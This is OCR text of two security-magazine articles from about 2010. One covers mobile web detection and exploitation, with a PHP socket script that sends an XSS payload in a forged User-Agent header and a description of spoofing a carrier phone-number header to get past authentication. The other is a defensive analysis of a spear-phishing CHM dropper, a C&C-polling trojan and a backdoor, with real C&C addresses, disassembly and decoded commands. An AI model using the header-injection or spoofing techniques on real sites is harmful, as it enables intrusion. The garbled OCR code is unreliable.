happened on a Nokia N70 V 5.0609.2.0.1 on 
which I have installed the browser Opera Mini 
v. 4.2.13918. The default browser needs the 
functionality discussed later in this article. 

Technical Limitations 

From a purely technical point of view, we must 
forget the possibility of some attacks so highly 



advanced and sophisticated, due to the bruta 
restrictions that you have when using a mobile 
phone. Moreover, the shell is not expected (in 
normal devices) and the browser does not 
provide specific extensions that are sometimes 
extremely important during the auditing and 
exploiting of a webapp. Moreover, the inability 
to manage multiple browsing sessions 
simultaneously causes a significant slowdown in 
the analysis phase. 

Mobile Web: The Meaning 

The Mobile Web is an opportunity to take 
advantage of many online services directly from 
a mobile device. Unlike a normal computer, a 
cell has a unigue mechanism by which the user 
interfaces with it. Just consider that the use of 
both hands (essential in the case of a keyboard) 
is reduced to two individual fingers (thumbs on 
both hands). Furthermore, any position taken by 
us during the Internet session does not affect the 
ability to continue to navigate safely, something 
unthinkable in the case of a PC. I read long ago 
on the OperaMini developers' blog a memorable 
phrase by Brian Suda, In essence, the mobile 
device is truly an extension of you and not visa- 
versa. 

h fact, the use of mobile web browsing 
is reduced to repetitive motions while looking 
for news or updates, which discouraged and 
demoralized the majority of web programmers, 
realize however that, at least in Italy, navigating 
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through your phone is not a common 
practice. I do not think that mobile 
operators are ready to offer attractive 
fares and a genuinely adequate 
coverage. The arrival of the iPhone has 
spread this practice widely and anyone 
with this device can not stay without the 
mobile web. 



Mobile Phones Detection 

The ability to detect whether a user is 
visiting our site from a mobile device, or 
simply from a laptop, is very important 
for web programmers. This situation 
makes it possible to implement a trivia 
service differentiation, i.e. the page 
displayed as output to the request for a 



site is different depending on the device 
from which we carry out the request. 
There are many PHP classes that allow 
such a possibility and they are often 
based on few lines of code (see 
Listing 1). 

The possibility of offering services 
ad hoc on the basis of the device from 



Listing 1. mobiledet.PHP 

<?PHP 

function mobile_detection ( ) ( 
if (isset (?_SERVER[ 'HTTP_X_WAP_PROFILE' j ) | | is set ( ?_SERVER [ ' HTTP_PROFILE ' ] ) | | isset ( S_SERVER [' UA-pixels ' ] ) ) { 
return true; 

$arr = array ( 

, alca'^> , alca' , 
' amoi ' => ' amoi ' , 
' benq'^'benq' , 
' ipaq'=> ' ipaq' , 
' j ava ' =>' j ava ' , 
' midp ' => ' midp ' , 
// 

' winw ' => ' winw ' , 

) ; 

if (isset (Sarr [substr (?_SERVER[ ' HTTP_USER_AGENT ' ] , 0, 4) ] ) ) { 
return true; 



Listing 2. telprot.PHP 

<?PHP 

requireonce ( 'wurflconfig.php' ) ; 
require_once (WURFL_CLASS_FILE) ; 
// 

$myDevice = new wurflclass {$wurfl, $wurfl_agents ) ; 

$myDevice->GetDeviceCapabilitiesFromAgent ($_SERVER["HTTP_USER_AGENT"] ) ; 
if ( $myDevice->getDeviceCapability ( ' wml_makephone_call_string' ) ) ( 

echo '<a href="' . $myDevice->getDeviceCapability ( 'wml_make_phone_call_string' ) . ' 0000000000">call me at 0000000000</a> ' . " \n" ; 
} else ( 

echo 'My telephon number is 0000000000 '. "\n"; 

} 

?> 



Listing 3. iswap.PHP 

<?PHP 

$device = new wurfl_class ( $ SERVER; "HTTP_USER_AGENT" ] ) ; 
if ( $device->browser_is_wap) { 

header ( "Content-Type : text/vnd . wap . wml" ) ; 

echo '<?xml version=" 1 . 0" encoding="ISO-8859-l" ?> ' . " \n" ; 

?> 

/ / wml code ... 
<?php 
} else { 
?> 

Sorry friend, we offer only WAP services . <hr> 
<?php I ?> 
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which the request starts, coincides with the 
capacity of the server to test the potentia 
of the device. This practice is considerably 
logical because it reduces the amount 
of data downloaded and thus leads to 
less spending (most mobile operators' 
charges are based on the navigation 
bytes swapped). 

It is usual to work in this direction by 
focusing on the output received from $ _ 

Table 1. OperaMini request headers 



SERVER [ ' HTTP _ USER _ AGENT ' ] , that 

is the browser string used by the user. 

Nonetheless, a new device with a 
screen resolution not recognized by 
the server, could access our site, so 
the latter would not be able to react, to 
provide a proper output. Hence arises 
the various issues and discussions 
about the possibility of proceedings 
in the design and planning of mobile 



Http-header 


Output 


X-OperaMini-Features 


<feature> *[ , <feature> ] 


X-OperaMini-Phone-UA 


<user-agent> 


X-OperaMini-Phone 


<manuf acturer> # <model> 



Listing 4. form.html 

<form action-socket . PHP method-post> 

<input type-text name-URL value-"Insert URL :) (for example /URL. PHP) "> 

<input type=submit valuer" Send" > 

</form> 



Listing 5. socket.PHP 

<?PHP 

$host-"localhost" ; 
$target= $_POST ['URL' ] ; 
$port=80; 
$timeout=60; 
?protocol="HTTP/l . 0" ; 
$br="\r\n" ; 

$sk=f sockopen ($host, $port, $errnum, $errstr, $ timeout) 

if ( lisresource ($sk) ) { 

exit ("Failed connection: ",$errnum." ".$errstr) ; 



else { 

// faked http-headers :P 

$headers="GEI ".$target." " . Sprotocol . Sbr ; 

$headers . -"Accept : image/gif, image/x-xbitmap, image/ jpeg" . $br 

$headers.="Accept-Language: boh" . $br ; 

$headers.="Host: ".$host.$br ; 

$headers . -"Connection : Keep-Alive" . $br ; 

Sheader s.=" User-Agent : <script>alert ( 'XSS =) ' ) </script>" . $br; 
$ headers . -"Ref erer : http : / /www . *** . it" . $br . $br ; 
fputs ($sk, $headers) ; 

$dati="" ; 

while (!feof($sk)) | 

$dati.= fgets ($sk, 2048) ; 



fclose($sk) ; 
echo $dati ; 



websites. Indeed it is usual in such 
cases to employ this device as a new 
phone and possibly point out the visit to 
the programmer. 

Wurfl & co. 

Wurfl is an extremely efficient 
ibrary composed of a database of 
characteristics of all mobile devices in 
circulation. When a mobile visits a site, 
you can determine its capabilities by 
looking to the wurfl database. The basic 
idea then is to design and implement 
a basic site and gradually increase this 
site, by looking at the characteristics of 
the device. 

The syntax to use the library is not 
complex and requires little knowledge 
of hypertext processor (PHP) or other 
programming languages. The classic 
example of using this library is directed 
towards the possibility to detect the 
screen resolution of mobile device 
that visit our site. Moreover it is usua 
to see if the phone supports or not the 
tel: protocol, whether it can make calls 
directly from the browser (see 
Listing 2). 

It is also important the possibility of 
making visible certain pages of a site only 
for browsers capable of interpreting the 
wireless markup language (WML), so we 
can exclude all visitors (connected from 
a computer) who wish to display pages 
optimized for mobile devices (see 
Listing 3). 

As shown emphasizes the need to 
rely on Wurfl where we were to design a 
big website for mobile devices. In fact, 
the efficiency is not comparable to that 
reached by a home-made PHP class. 

Opera Mini Browser 

The browser is the key while browsing 
the web. I believe it is essential to 
devote a paragraph to Opera Mini, even 
considering the closed standards of 
Opera corporation (we prefer the open 
source). This browser is in my opinion the 
top in the circulation for mobile devices. 
It is able to run on any device with a 
JVM (Java Virtual Machine), however the 
benefits are different on the basis of the 
hardware of your device. The request 
for a website crosses Opera servers to 



40 HAKIN9 2/2010 



MOBILE WEB: PRIVACY KEEPING AND EXPLOITATION METHODS 



minimize the use of bytes and make the 
content accessible by mobile phone. 

From a technical standpoint, Opera 
Mini uses certain unregistered HTTP 
headers, such as X-OperaMini-Features, 
X-OperaMini-Phone-UA, X-OperaMini- 
Phone (Table 1), which at the end of this 
treatment can be used with lawful or 
unlawful intent. 

Approach to Classical 
Attack Methods 

We can continue the discussion focusing 
on known vulnerabilities of Cross Site 
Scripting orXSS, i.e. the possibility to 
inject malicious code within web pages. 
This scenario is usually caused by the 
ack of precautions by programmers 
during the validation of input coding (see 
Figure 1). 

h the case of mobile devices the 
ability to identify and possibly exploit 
vulnerabilities happens as if we had a 
computer. 

There is a similar situation in the 
case of vulnerabilities like RFI or LFI, 
namely Remote / Local File Inclusion, 
h such cases it is still complex to 
experience the security flaw because 
it is closely related to the possibility of 
keeping an eye on the URL of the page 
you are visiting, which is sometimes 
masked on your browser for mobile 
devices. 

Playing with PHP Socket 

So far we discussed everything from a 
purely theoretical point of view, so let's 
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gain some practical insight. First we 
can try to write PHP code to generate 
some minimalistic pages so as to avoid 
spending lots of money during our web 
sessions. 

As many readers will know the 
communication between a client and a 
server happens by sending the http- 
headers. That is information regarding 
the reguest made to the server, the 
browser used by us, etc. The headers 
are generated by the browser itself so it 
is possible to modify that information ad 
hoc in order to inject malicious code into 
the log pages, which will be occasionally 
checked by a special permission user 
(administrator). Eventually this practice 
will coincide with the execution of the 
code we entered. This situation is 
usually carried out by ordinary browsers 
(not mobile browsers) by installing the 
appropriate extensions (for example, 
Modify Headers, Live HTTP Headers for 
Firefox). 

Of course, it is conceivable to 
implement a similar attack from our 
mobile device through a few lines of 
PHP code, in particular through the 
fsockopen function, which is able to open 
a connection to a socket belonging to an 
Internet domain. 

magine you have a page form.html 
(see Listing 4) through which you can 
enter the URL of the page to which we 
wish to connect and a script in the form 
socket. PHP (see Listing 5). 

Extracts of the code just transcribed 
allow you to change your http-headers, 




guietly changing the parameters in 
socket PHP so it becomes extremely 
easy to use that page from your mobile 
device and perform a change of http 
headers without any extension installed 
in your browser! Actually establishing a 
connection using the PHP function just 
mentioned (fsockopen) implies a very 
significant cost in terms of time (let's not 
forget that the cost analysis is essentia 
for the software engineers). 

Figure 2 and 3 have a situation very 
similar to what we just explained, we have 
related to a page whose output is the 
faked user-agent with a XSS feedback. 

"X headers" 

and Funny Spoofing 

Some names of particular http-headers 
begin with 'X'. They are not at all standard 
fields; they are used to receive a 
different output based on settings that 
characterize our mobile device. It is 
possible to identify a list of the most 
used X headers {http://mobiforge.com/ 
developing/blog/useful-x-headers). 

Of course, we must emphasize that 
the device from which we conduct the 
test sends different headers based 
on the browser used by us and even 
the phone company. In fact, some 
mobile operators assign an id to every 
single SIM card, which is sent in a field 
of x-header. This mechanism is very 
important because it implies the need to 
authenticate (or recognize) a user visiting 
a site. In practical terms it is sufficient to 
use an if - else statement to check if the 
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Figure 1. A mobile xss 



Figure 2. form.html from my Nokia N70 
(Opera Mini) 



Figure 3. faked user-agent with fsockopen 
and output (xss) 
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Listing 6. re/num.PHP 




<?PHP 




echo "Your telephone number is: ".$ SERVER! "HTTP X UP SUBNO"] 


." <br>"; 


echo "x-wap-profile: ".? SERVER I 'HTTP X WAP PROFILE ']. "<br>" ; 




echo "user-agent: ".? SERVER [ 'HTTP USER AGENT ''. "<br>" : 
?> 




Listing 7. exoticauthentication.PHP 




<?PHP 




// 




?num = $ SERVER [ "HTTP X UP SUBNO"]; 




if (isset($num) && isRegistered ( $num) ) 




echo "Access granted..."; 




else 




echo "Access denied..."; 




?> 
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Figure 4. Links2 on my Openmoko NeoFreerunner (with Debian) 



id associated to the visitor of our web 
page is in our database. If the outcome 
of the check is positive, it is possible to 
proceed with the user authentication 
(he will be able to enter in reserved 
areas). Hence the time required to log in 
disappears! 

Nevertheless, the scenario mentioned 
above can lead to a whole range of issues 
in terms of privacy. When authentication 
occurs on the basis of a value on our SIM 
card, privacy is violated dramatically. The 
theft of our mobile device can lead to the 
possibility of an attacker gaining access to 
areas and information strictly private that 
we reserve online. 

Code stated in Listing 6 brings to 
light the possibility of a web programmer 
to retrieve the phone number of all 
visitors. I want to emphasize that these 
kinds of headers are empty in most 
cases! 

The possibility to spoof the phone 
number through the modification of 
headers with the technique mentioned 
previously (fsockopen) creates a 
vulnerability very relevant; fortunately this 
type of authentication is almost absent 
and highly discouraged with this article. 

We can also present an example of 
an exotic authentication (I think that is 
not currently used at all). Considering 
the Listing 7 there is a blind vulnerability 
which paves the way for a lot of privacy 
problems, if the phone number was 
spoofed. 

Mobile Web Testing 

The testing of a mobile website is 
fundamental to understand vulnerabilities 
and fix them. It appears, however, 
awkward and complex to make testing of 
a mobile web page from a mobile device 
because of the mentioned limitations. It 
is possible making testing in peace from 
your computer through the browser that 
we use for our daily browsing sessions. 
Opera provides an opportunity to visit 
sites written in wml. 

Even using Firefox you can do testing 
by your computer, which emulates the 
behavior of a mobile device connected to 
the Internet. 

This is achieved through the 
installation of an extension, which is Modify 
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Headers through which you can change 
the http-headers sent to the server 
Changing the user-agent header and 
adding the x-wap-profile header allows you 
to receive an output similar to what would 
happen if we were visiting the site from our 
phones. 

It is also possible to use a variety of 
emulators online. As shown in this section 



also allows you to save money (and time!). 
You can find other important informations 
here, http://mobiforge.com/testing/story/ 
testing-mobile-web-sites-using-firefox. 

Unconventional Mobile 
Device: NeoFreerunner 

guote the opinion of the Openmoko wiki, 
The Neo FreeRunner is a Linux-based 



touch screen smart phone ultimately 
aimed at general consumer use as well 
as Linux desktop users and software 
developers. In practice we can have a 
Linux environment wherever we are. The 
NeoFreerunner (gta02), while still unripe 
and considerably younger; is a mobile 
platform with large potential. There are 
an infinite number of distros to install and 
many applications. 

h this case, the discourse moves 
away from the examples presented 
so far as the gta02 is close to being 
a mini laptop; when installing Debian, 
Gentoo or Arch the ability to analyze a 
mobile website will change dramatically. 
This stems from the fact that you have 
access to many applications that we use 
normally on our computer (see Figure 4). 

Still on the subject, NeoPwn is a 
pen-test oriented distro. It is based on 
Debian and reminiscent of BackTrack. 
We don't want to continue the discussion 
in this direction because it would be 
considerably off track, just think that it is 
possible to hack a WEP / WPA network 
with a NeoFreerunner ... (see also 
Figure 5). 

Conclusions 

We have presented some scenarios with 
good detail, but the fact remains that 
anyone who wants to start hacking from 
your mobile device must continue to 
inguire about it. I hope that with the release 
of new mobile devices, the human- 
machine interaction is becoming ever 
simpler and therefore the ability to analyze 
a mobile website is becoming affordable 
for many. Sorry for my bad English. 
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http://mobiforge.com/developing/blog/useful-x-headers - a list of useful x-headers, 
http://www.opera.com/mini/ - Opera Mini browser, 
http://dev.opera.com/articles/mobile/ - good articles by Dev.Opera, 
http://www.php.net/fsoctopen - fsockopen PHP function, 

http://www.w3.org/Protocols/rfc26l6/rfc2616-secl4.htmlisec14.43 - User-Agent http- 
header. 
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Figure 5. Midori on my Openmoko NeoFreerunner (with Debian) 
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WHAT YOU WILL 
LEARN... 

How to rapidly examine and 
triage a real-world malware 
threat from an intrusion 

How to perform basic reverse 
engineering 

WHAT SHOULD YOU 
KNOW... 

Basic malware handling 
Basic x86 assembly 



Intelligence Report: 
Analysis of a Spear 
Phishing Attack 



A spear phishing attack occurs when an attacker sends targeted 
emails tailored to a specific user or organization. The execution of 
the attack can vary by the underlying goals of the attacker. 



n some cases, the goal may be to gain 
information from user In other cases, the objective 
may be to gain access to target networks 
Generally, the attack is conducted by convincing 
the user to either download and run a malicious 
attachment or interact with the adversaries 

This report analyses a detected spear phishing 
attack, and the actions that were taken to investigate 
the technigues used and the origin of attack. In this 
incident, a spear phishing attack was blocked and 
actions were taken to study the technical aspects of 
the attack. This report will examine the mechanisms 
used to deliver the attack, review the disassembly 
of tools, and the features that enabled defenders to 
effectively mitigate the attack. 

Numerous methods were employed during 
the investigation of this attack. First, we utilized 
static analysis to examine all files. Tools such as 
DA Pro, Radare, and Hiew were used to review 
binaries. We also examined the malware at run 



time utilizing virtual machines and dynamic 
analysis tools such as Immunity Debugger, Python, 
and Fiddler Executables were also modified to 
enable a simulated C&C {command and control) 
to interacting with executables being observed 
inside the virtual machine. Finally, basic network 
reconnaissance was performed to monitor 
systems managed by the attacker 

As with any spear phishing attack, there was an 
enticing social engineering element compounded 
with some low-tech tactics that would drop a trojan 
and then poll a website for commands. After a 
period of time, the adversary updated the site with 
a download command, which in turn was used to 
make the trojan retrieve the backdoor The backdoor 
is a minimal command shell that gives the attacker 
OS level access to the host and conseguently 
the targets network. The remainder of this paper 
will discuss the response to the attack and the 
subsequent analysis of the retrieved components. 
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23pObjec^d^"RUNIT^flDTHl^ </object 
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Figure 1. CHM file call to the embedded executable, svchost.exe 
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ANALYSIS OF A SPEAR PHISHING ATTACK 



The Staged Attack: 
Functional Analysis 

h this section, the primary components 
of the spear phishing attack are broken 
down and discussed in detail. The first 
subsection looks at the first phase where 
the attacker sends the email with a 
malicious attachment. The attachment 
drops a trojan that then polls a controller 
site. To initiate the next phase of the attack, 
the malware is directed to download a 
backdoor In following subsection, the 
functionality and characteristics of the 
backdoor that was retrieved is discussed. 

The Primary and Secondary 
Payloads 

The first stage of the attack of any 
successful spear phishing attack reguires 
a believable social engineering email. The 
social engineering email manipulates the 
target in an effort to earn trust or pigue 



curiosity. The manipulation may involve 
utilizing false or true information along 
with personal information to make the 
target believe the adversary knows them. 
Once the target trusts the attacker the 
attacker can advance the scenario. Due 
to privacy concerns in this case, access 
to the spear phishing email was not 
granted, but the attachment contained in 
the malicious email was made available. 

The campaign for this case used a 
malicious attachment that contained a 
trojan. The attacker extensively profiled 
the targets and organizational they were 
in before sending the phishing bait. The 
bait contained a very convincing story 
for opening the attachment. When the 
malicious attachment is viewed, it will start 
a trojan in the background on the target's 
computer The malicious attachment used 
in this attack campaign is a Microsoft's 
Compiled HTML Help file (CHM) format, 
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Figure 2. Registry key where the malware is Installed 
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Path: 




C:\WIMDOWS\Downloaded Program Files\svchost.exe 




Command line: 




"C:\WINDOWS\Downloaded Program Files\svchost.exe" 




Current directory; 




C:\Documents and 5ettings\Administrator\Desktop\ 









Parent: hh.exe(3128) 

User: APRIDGEN-E8FBA8\Administrator 

Started: 11:26:51AM 6/22/2009 



Bring to Front 



which drops and starts the malware 
process, svchosr.exe shown in Figure 3. 

Figure 1 shows the section of the 
CHM responsible for dropping and 
starting the executable in the background 
on the victim's machine. The CHM file 
itself, uses content linked from true open 
source material that is domain specific to 
the target. The content seen in this case 
includes information from a legitimated 
web site, as well as referencing the Federal 
Reserve Board (FRB) Conference on Key 
Developments in Monetary Economics. 

Once the executable starts, it sets a 
Microsoft Window Registry key that will run 
the trojan automatically upon start-up. Figure 
2 shows the registry key and the registry 
location where the key is installed. The key is 
a known startup key, but not one of the most 
commonly used. After setting the registry 
key, the binary then polls hard coded host 
and URI, which will send commands in the 
comments of the web page. The command 
embedded in the page is Base64 encoded 
and surrounded by <!— ... — !>tags. 
Static analysis of the trojan showed a limited 
set of known commands. These included: 

sleep 
download 
connect 
cmd 
guit 
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Figure 3. Trojan started by CHM file 
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X-Pcvcrcd-ay: U9JRT 

Pace: Thu, 21 Jun 2009 li.QO.22 OR 



black:- apndgenj soeac - TGP4 : run. ha I dent , CMn.au: 98 

HE XT' / http/i.i 

Boat : m . ha Ident . coo . au 

HTTP/ 1.1 200 OK 
Contcnt-LenfftJj! J899 
Content-Type : text/ html 

Content -Location: ht t p : //m*t<t . ho ldent .con. au/ index . htnl 
Laat-Kodiried: Thu, 26 f-.-i. 2009 GET 
Accept -Ranges: bytes 
ETag: -2Ctt>92tebc97cg'i :bOd" 

K T ' L :■" - . 

X-Pevecsd-Sy: ASP .NET 

Date: Thy, 25 MM 2009 15:57:07 OUT 



black:- apndgenl accit - TCM : 6) . 228 . 128 . 19: 80 
HE1D / HTTP/ 1 4 1 
Host: 63.22S.12B.19 



HTTP/ 1.1 200 OK 
■"■!■.- - :.r - I !.: 1433 

Content-Type t text/ html 

Content -Location: ht t p ://*3 .228 . 128- 19/ 1 isst M t -htm 

Lut-Rodlf led: Ron, 25 Jun 2001 :3:Qti:04 C-RT 

Accept HkWBMI bytee 

ETag: - IbaldS 52 9b7c7 1 : 6X6" 

Server: Hicroaoi t-IIS/ti.O 

X-Povered-Byi A3P , HIT 

Pate: Thu, 25 Jun 2909 15:54:20 OflT 



Figure 4. HTTP HEAD command 
performed on all the servers 
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During run time analysis, only the sleep and 
download commands were observed to be 
used by the attacker The sleep command 



forces the dropper to sleep for a period of 
time, based on a parameter passed to the 
function. The live analysis showed that the 



SIDXHDR 

jflTBTTS 

^STRINGS 

SSYSTEH 

ATOPICS 

SURLSTR 

8URLTBL 

^WINDOWS 

SriftiHain 



S OBJ INST 

5 HTJ Assoc iat iveL infcs 
$HWKevwordLin)cs 
FRB_Conf erence on Ke 
newpr eject . nine 
newpro ject . hhk 
nrirr 

svc host . este 



Developments in nonet 



conamic . httt 



Figure 5. Dumped CHM files 



GetModuleHandleA 



r \ M * I J. JTTTi ITC J7F 1 



83.228.22.138 



login.html 



c2xlZXA= 
Y21k 
cXVpdA= 
+windows+NT+5.1 
. exe 

HTTP/1.1 

%S %5 
--!> 
<l -- 
Update 

Software\Hicrosoft\Windows\CurrentVersion\Policies\Explorer\Run 

apr idgenfBsiipapwn : -/analysisS python 

Python 2.G.2 < release26-naint, Apr 19 2889, 81:58:18) 

[GCC 4.3.3] on Unux2 

Type "help", "copyright", "credits" or "license" for more information. 
»> from base 64 import decodestrinq 

»> tor i in ["dW5zdXBwb3J8", "c2xlZXA=", "Y21k", 'cXVpdA="J decodestring(i) 

' unsupport ' 
'sleep" 
[ cmd' 
f quit' 

I ■ 1 



Figure 6. strings output with Base64 decoded strings via Python 



pop 


ecx 


push 


400000b 






lea 


edi, [ebp+var_8F] 


mov 


eax, offset 


byte_40A!B4 




rep stosd 


push 








and 


[ebp+Source] , 0 


push 


eax 






1' USQ 


OFh 


push 


- -i 






StOSV 




lea 


eax, [ebp+var 5Gi] 




stosb 




push 


0 






pop 


ec:-: 


push 


eax 






xor 


eax, eax 


push 


[ebp+Stc] 






lea 


edi, [ebp+var 4F] 


call 


ds: InternecConneccA 




and 


[tbp+Count] , o 


test 


eax, eax 






cep stosd 


mov 


[ebp+var C] 


eax 




at os a 




j ~ 


short loc 401217 




stosb 








1 11 


lea 


eax, [ebp+Source] 


hmlu 






1 H:.l'. 


eax 


push 


0 \ 1 




lea 


tax, [ebp+var 90] 


push 


•iODOOGOh I 




push 


eax 


push 


offset off j 


103010 


push 


offset Format 


push 


° \l 




push 


[ebp+Src] ; See 


lea 


ecx, [ebpl+3 


mrce] 


rail 


ds:3scanf 




offset aHtt 


ll 1 ; " HTTP 


i . I" 


add 


esp, lOh 


push 


ecx \ 




cmp 


eax, 1 


push 


offset aGep 


1 ; "C^T" 


j : 


short 'lovnload update 


push 


eax \ 






call 


daiHttpOpen 


'.LqueatA 






xoc 


ecx, ecx 








mov 


[ebp+var •)] ,! [eax 






cmp 


eax, ecx 


\ 






■in? 


■Imrt Inr 4nlllFir 



attacker's page would make the trojan poll 
every 10 minutes. The download command 
downloads and executes a binary specified 
by the attacker This command accepts a 
host or FQDN (fully qualified domain name) 
and then a URL It uses the WinHTTP library 
to establish network connections. After 
approximately 8 hours of time, the attacker's 
page updated with this command, and the 
trojan would have received the location of 
the new binary to executed. A script was 
used in place of the trojan to poll and 
monitor the site, and once the command 
was received, the script downloaded the 
binary from the site. After the retrieving the 
binary, it was analyzed and found to be a 
back door The next sub-section will detail 
the functionality of this binary. 



push oftsec a:o3_::o_::_iJ8 



pus h til 

push ^OOQOOOh 

push OftMC Vtt 403010 



I H hi 



b offset aHtcpl_l 
pusti ottset «Lc^nn_htnij 
push offset aGet 



coll d*:Htsr-.f 
nv edi, »ax 



Figure 8. Trojan contacting a hard coded 
server for commands 




Figure 9. Fiddler intercepting trojan web 
traffic 

; mt cdeci handle con*nafld lnpag* <chat 'Stc, lnt 
Ji<uidle_ccpmiwuid_lnpaeje ptoc neat : CODE XP.E1 



vac FE 



• bye* pte * IQOh 

- byte ptr -OFEh 

- dword per Q 

- dvoid pet U'.'h 



push 
mov 

w 

push 
push 

I ■lit]! 

mov 
I- - l 

:■: :-t 



ebp 

ebp, esp 

cop, IQOtt 

ax, : . i; : 

esi 

•41 
3Fh 

vctd pre [efip+l'-nt] , ax 



ill i Itirir 



trc-V ■ 

push offset SubStt 

push [ebp+Stc] 
rep stosd 
■con 

call -si itrstr 

push offset asc IH 



Figure 7. Code that downloads a file from an attacker controlled server 



Figure 10. Tokens used to Identify 
commands In the web page 



46 HAKIN9 2/2010 



ANALYSIS OF A SPEAR PHISHING ATTACK 



The Backdoor 

After retrieving the new binary from the 
attacker's specified site, the functional 
properties and characteristics were quickly 
studied. Since this binary was deemed 
hostile, we created a private environment 
to mimic a command and control server. 
The binary was modified to connect to 
our emulated C&C and then executed 
inside a virtual machine. The following is 
a summary of actions that occur without 
human intervention. 

After the backdoor is downloaded and 
written to the disk of the compromised 
host, the dropper starts the binary using 
WinExec. At this point, the backdoor uses 
WSA sockets to connect to a hard coded 
server on a specified port. If the backdoor 
encounters any errors or cannot connect 
to the server, the backdoor self-destructs 
by deleting the executable image on disk 
and then exits. 

If the backdoor makes a successful 
connection, it sends the Base64 encoded 
string, connect, upon which the client can 
send back anything. The functionality of 
the backdoor is minimal, but the available 
commands allow the attacker to execute 
commands on the OS. The backdoor 
accepts any input, but only processes 
the cmd or quit commands. If the quit 
command is specified, the backdoor 
performs the selfdestruct function. 

The cmd invokes the minima 
command shell environment. In this 
environment, the accepted commands are 
any OS-level command or executable in 
the current path, cd, or quit and exit. The cd 
command will change the current working 
directory of the environment. The quit and 
exit commands perform the same function 
of leaving the command shell. 

Spear Phishing System 
Protections 

This phishing system appears to be 
engineered to have low impacts on the 
entire operation if there is a compromise 
to any of its components. Additionally, the 
components hide in plain sight, and none 
of the items were identified by anti-virus 
(AV) or host intrusion prevention systems 
(HIPS).These observations stem from the 
fact that the servers went untouched for 
nearly a week after the initial analysis of 



the operation commenced. There was 
an attempt to identify other servers using 
a similar control channel using search 



engines, but the search engines do not 
retain the HTML comments as searchable 
metadata. The alternative to the search 
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50 
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FF1S fiC2040Se 
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8D44J4 14 
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id 40 

68 B49C4800 
57 

FF15 C4204000 
57 

894424 14 
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PUSH LfiX 
PUSH EflX 
PUSH EfiX 
PUSH EfiX 
PUSH EDI 

(ILL DWORD PTR OSsLX&WININET.HttDSendRe. WININET.H-etDSendReauestH 
TEST EfiX. EfiX 

MZ SHORT suchost. 90481700 
PUSH EDI 
ESI 

push EE;: 

f-JLL ESI 
PUSH EBP 

CALL ESI 

.IMF SHORT suchost. 00461687 

LEfi EfiX. DWORD PTR SS:tESP+14] 

PUSH EfiX 
PUSH 40 

push •wahow.eMMC&t nscii -<»— czontijFe— !>/s<< 

PUSH EDI I 

iLL DWORD PTR DS: [<&WININET. InternetRe ...^ ..^ .. .._„„. 

MOD DWORD PTR SS: CESP-H4I.ERX 
CRLL ESI 
PUSH ee:: 
CHLL ESI 



Nddress I Hen 



e«M(l« 00 -id 00 00 
00409D94 00 80 00 00 
00409D9C 06 90 00 00 



I ASCII 



Figure 11. immunity Debugger displays the command parsed by the trojan 
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Figure 12. Elapsed commands between the client and server 



ciiuTj.holdenc.com. au", "/error, jpg" 



mmmm^^t s = connect_send ( "mmb . holdent . coi 
Sending the following. 

GET / error.jpg HTTP/ 1 . 1 
Accept: */ * 

Use r - Age nt : +¥ i ndo ws +NT+5 . 1 

Host: 203.220.22.138 



requestwww. holdent . com. au 

buf = s.recv(8192) 
— ~~ buf 

'HTTP/ 1.1 404 Not Found\ r\ nContent-Length: 1635\r\nC 
4:14 GMT\ r\ n\ r\ n< 1 DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01// 
text/html; eharset=Windows-1252 ">\ r\n<STYLE type="text/css">\ r 
ited ( color: maroon ) \ r\ n</ STYLE>\ r \ n</ HE ADXBOD YXTABLE widt 

name changed, or is temporarily unavailable. \ r\ n<hr>\r\ n<p>Pl 
tted correctly . </ li>\ r\ n<li>If you reached this page by clicfci 
cr ipt : history .back( 1] ">Bac]c</a> button to try another link.</l 

(for support personnel) </p>\ r\ n<ul>\ r\ n<li>Go to <a href="htt 
</b>.</li>\r\n<li>Open <b>IIS Help</b>, which is accessible in 



Figure 13. Second attempt to retrieve the binary 
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engines is to spider hosts the Internet web 
pages and look for the Base64 comments 
In each page. Given the timeframe of this 
analysis, the later is not a viable option. 

With regard to the binary protections, 
the initial dropper is a CHM that placed a 
basic trojan on the disk. The trojan is an 
unpacked and unencrypted binary, and it 
communicates with the attackers using 
plaintext encoding. When the trojan exits, 
it does not delete itself from the disk and 
starts up again on reboot. No threads or 
CRC monitor the binary for changes. 



The backdoor that is downloaded 
in the later phase of the attack is also 
an unprotected binary. It is not packed 
nor is it encrypted. The backdoor also 
communicates with attacker's servers 
using plain text channels. Unlike the trojan, 
the backdoor does delete itself from disk 
on exit or when it encounters an error. 

Spear Phishing System 
Detailed Analysis 

h this section, the analysis methodology is 
explained. This section highlights the tools 



and process utilized to perform the analysis 
of the spear phishing attack. The analysis 
placed an emphasis on several areas. The 
objective of the analysis is to identify any 
clues about the attackers, functionality of 
the system so that an adeguate response 
can be performed, and then identify any 
vulnerabilities that would allow a penetration 
into the attackers network. 

Analyses of the various components 
were not performed in the order they are 
laid out in the following sub-sections, but 
the sub-sections detail how the analysis 
is performed and what information is 
gained by the analysis. The first sub- 
section discusses information yielded 
from a covert external analysis of the web 
servers. The following subsection focuses 
on the dropper and the trojan used by the 
attackers, and the final subsection pertains 
to the analysis applied to the backdoor 
retrieved from the attackers site. 

Server Analysis 

The analysis methodology applied to 
the web servers was black box in nature, 
because there was no access to the 
systems. Also, the analysis focused more 
on being covert about the analysis and 
reconnaissance. The results of the server 
analysis are based on metadata collected 
and inferences drawn from that information. 
There are three web Based on the results of 
HTTP HEAD reguests, all three servers were 
profiled as Microsoft IIS 6.0 web servers, 
which imply that the servers are running 
Microsoft Server 2003 operating system. 

The server the trojan polls, 
203.220.22.138, has been up and running 
since Thu, 16 Oct 2008 11:02:56 and 
resolves to www.techsus.com.au. A guick 
Google Search of this IP reveals that it 
has been maliciously active for a while. A 
McAfee signature shows that the backdoor 
activity in September 2007 (Backdoor-DMG, 
McAfee Inc., http://vil.nai.com/vil/content/ 
v_143081.htm). The serverthat hosted the 
backdoor for download had the index page 
modified recently, and it appears to also be 
hosting command and control information 
in its page as shown in Figure 4. The server 
that the backdoor connects to 63.228.128.19 
has been running since Mon, 25 Jun 2007 
13:06:04 GMT. The results of our HEAD 
reguests can be seen in Figure 4. 




— 1 D p 3 d3 cuaG9s Z GVudC 5 j b 2 Ou YXUg 2 X J yb 3 1 uanB n— ! > 



<html > 



<head> 



Figure 14. Download command received from the server 



pnmnn r.np m i ininnn. 



GET /login. html HTTP/ 1.1 
Accept: */* 

User-Agent : ,+Uindows+NT+5 . 1 

Host: 203.220.22.138 



request 2 03 .2 20.22 . 138 
Recvd : 

